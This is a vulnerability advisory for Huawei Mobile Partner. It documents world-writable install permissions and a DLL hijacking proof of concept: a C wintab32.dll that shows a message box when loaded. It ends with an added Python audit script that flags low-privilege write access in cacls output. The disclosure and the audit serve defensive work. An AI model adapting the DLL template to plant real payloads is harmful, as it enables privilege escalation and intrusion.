Huawei Mobile Partner DLL Hijacking

Posted on 21 October 2014

# Title: Huawei Mobile Partner Multiple Vulnerabilities
# Version: 23.009.05.03.1014
# Tested on: Windows XP SP2 en
# Vendor: http://www.huawei.com/
# Software-Link: http://download-c.huawei.com/download/downloadCenter?downloadId=18474&version=16815&siteCode=worldwide
# E-Mail: osanda[at]unseen.is
# Author: Osanda Malith Jayathissa
# /!\ Author is not responsible for any damage you cause
# Use this material for educational purposes only

#1| Local Privilege Escalation
--------------------------------

- Description
==============
Any user on the system can replace the legitimate binary with an arbitrary malicious executable. A user can also place a malicious wintab32.dll file inside the "Mobile Partner" folder and perform DLL hijacking easily. An attacker who breaks into a low-privilege account could use this application to escalate privileges.

- Proof of Concept
===================
C:\Program Files>cacls "Mobile Partner"
C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F
                                BUILTIN\Users:(CI)F
                                NT SERVICE\TrustedInstaller:(ID)F
                                NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                NT AUTHORITY\SYSTEM:(ID)F
                                NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                BUILTIN\Administrators:(ID)F
                                BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F

C:\Program Files>cd "Mobile Partner"

C:\Program Files\Mobile Partner>cacls "Mobile Partner.exe"
C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F

#2| DLL Hijacking Vulnerability (wintab32.dll)
-----------------------------------------------

#include <windows.h>

int owned(void);    /* forward declaration: DllMain calls owned() before its definition */

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        owned();    /* runs when the host process loads the DLL; falls through to break */
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

/* Harmless marker: shows a message box to prove the planted DLL was loaded */
int owned(void) {
    MessageBox(0, "Mobile Partner DLL Hijacked Osanda Malith", "POC", MB_OK | MB_ICONWARNING);
    return 0;
}
/*EOF*/
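
The following audit check is an added example, not part of the original advisory: it parses `cacls` output of the kind shown in the proof of concept and reports write-capable grants to low-privileged principals, which is the condition that makes both the binary replacement and the wintab32.dll planting possible. The `LOW_PRIV` set and all function names are assumptions made for illustration; the sample is the advisory's folder listing with path separators restored.

```python
import re

# Sample input: the advisory's cacls listing for the install folder (separators restored).
FOLDER = r"C:\Program Files\Mobile Partner"
SAMPLE = r'''C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F
                                BUILTIN\Users:(CI)F
                                NT SERVICE\TrustedInstaller:(ID)F
                                NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                NT AUTHORITY\SYSTEM:(ID)F
                                NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                BUILTIN\Administrators:(ID)F
                                BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F
'''

# Assumption: principals this audit treats as low-privileged.
LOW_PRIV = {"BUILTIN\\Users", "Everyone", "NT AUTHORITY\\Authenticated Users"}
WRITE_RIGHTS = {"F", "C", "W"}  # cacls letters: Full control, Change, Write
ACE_SPEC = re.compile(r"((?:\([A-Z]+\))*)([A-Z])")  # e.g. "(OI)(IO)F" or "F"

def parse_cacls(output, path):
    """Return (principal, inheritance_flags, right) tuples from cacls output for path."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):            # only the first line carries the path
            line = line[len(path):].strip()
        if ":" not in line:
            continue
        who, spec = line.rsplit(":", 1)
        m = ACE_SPEC.fullmatch(spec.strip())
        if m:                                # multi-line "special access" entries are skipped
            flags = set(re.findall(r"\(([A-Z]+)\)", m.group(1)))
            aces.append((who.strip(), flags, m.group(2)))
    return aces

def risky_aces(aces):
    """Flag ACEs that let a low-privileged principal write or replace files."""
    findings = []
    for who, flags, right in aces:
        if who in LOW_PRIV and right in WRITE_RIGHTS:
            # (IO) = inherit-only: the grant applies to children, not the object itself
            scope = "child objects only" if "IO" in flags else "this object"
            findings.append((who, right, scope))
    return findings

if __name__ == "__main__":
    for who, right, scope in risky_aces(parse_cacls(SAMPLE, FOLDER)):
        print(f"[!] {FOLDER}: {who} has {right} ({scope})")
```

On a correctly permissioned install directory under Program Files the check returns no findings, because only Administrators, SYSTEM and TrustedInstaller hold write access there.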

 
